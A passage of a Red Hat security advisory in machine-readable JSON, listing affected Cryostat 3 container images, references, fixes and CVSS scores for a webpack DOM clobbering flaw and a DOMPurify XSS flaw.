"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-45801",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2024-09-16T19:20:09.863249+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2312631"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in DOMPurify. This issue may allow an attacker to use specially-crafted HTML to bypass the depth checking or use Prototype Pollution to weaken the depth check, which can lead to cross site scripting (XSS) attacks.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "dompurify: XSS vulnerability via prototype pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The vulnerability in DOMPurify, while significant, is categorized as moderate severity rather than important due to its specific conditions for exploitation. The issue requires not only a sophisticated nesting technique to bypass the depth checks but also the ability to leverage Prototype Pollution to weaken these protections. This makes the attack scenario relatively complex and less likely to be encountered in general use cases. Furthermore, the flaw impacts only certain configurations and usage patterns, thus reducing its immediate risk.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-45801"
},
{
"category": "external",
"summary": "RHBZ#2312631",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2312631"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-45801",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45801"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-45801"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21",
"url": "https://github.com/cure53/DOMPurify/commit/1e520262bf4c66b5efda49e2316d6d1246ca7b21"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc",
"url": "https://github.com/cure53/DOMPurify/commit/26e1d69ca7f769f5c558619d644d90dd8bf26ebc"
},
{
"category": "external",
"summary": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674",
"url": "https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674"
}
],
"release_date": "2024-09-16T19:16:11.080000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T01:12:29+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7706"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.0,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:H/A:L",
"version": "3.1"
},
"products": [
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:94f2ad856ccc1d3efed8871303ac0a0792efe8150ba0e7e1152f02e8e3acc80a_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-db-rhel8@sha256:cde38f98de9a139e0fa7e835dfc1d2c56ee91087cd01da4ce4bc46b06e0fd7ec_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:8ce54e90618eaa45627ed97e55a93e7754006f760b2f2e619c02f93c9acb5ce3_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-grafana-dashboard-rhel8@sha256:944d74356fd1997334e40e2ed60a2d2f3a4730895a4dab0e5952fc8de51edf3a_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:82a87b4ee8e5a4ebdb4f3c5df7d3d7ff5e8ebcf4313548072c0dbed08df2eb51_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-operator-bundle@sha256:93d0b7f6a0bb26707fffb1b18485427641711dbc6161effb28b4b5eaee5a612d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:4e8c4c26564bfa6d15cb3dd1ed0bf1a707f0dee78ddd1c0f801acd740f06ab0f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-ose-oauth-proxy-rhel8@sha256:c38a44a12a45b65045576ab373e7d18641995709c4d330e01c3fe23ad74a280f_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:194e839e5733e70303b38d212362898b03fe0c12765726b159703d718787e7d6_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-reports-rhel8@sha256:2bc3f4475c1eac40cda1528944416f42af49b669fec8762e3dbad40a023f3bb4_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:af720cf07d638057b31dea56cc3514d394dc39461acef8d2573c4b0205c309d7_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8-operator@sha256:ff17460450719304fff283aeeb2ac59f9644bb2c659d38ea7520fe31b8aff41d_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:180392716b08b100430cddfd46b84c1b5b2a8648d53a36e67e1984359d5bba3b_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-rhel8@sha256:aef0dc11169bf71824ff16a3fe307343cd07522b10e0759912f77c1b1e05b34c_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:5296794a5d38c60165a86671ced7e3812f75e2355d8a6d9721ab89accc93c1a6_amd64",
"8Base-Cryostat-3:cryostat-tech-preview/cryostat-storage-rhel8@sha256:7e2ec282045e2698b254a26142c38d9923a8fbc0f7e096539df1f9fa86163234_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:30a0e9843b9b8f11305788baaef33534144dbe04e9b314e04534e6f13967b69f_arm64",
"8Base-Cryostat-3:cryostat-tech-preview/jfr-datasource-rhel8@sha256:d6aca1dcf4bee8abfa4f0c674e7cdad49289d2c8bd77e0ccdd44e0e93df66455_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "dompurify: XSS vulnerability via prototype pollution"
}
]
}
RHSA-2024:8023
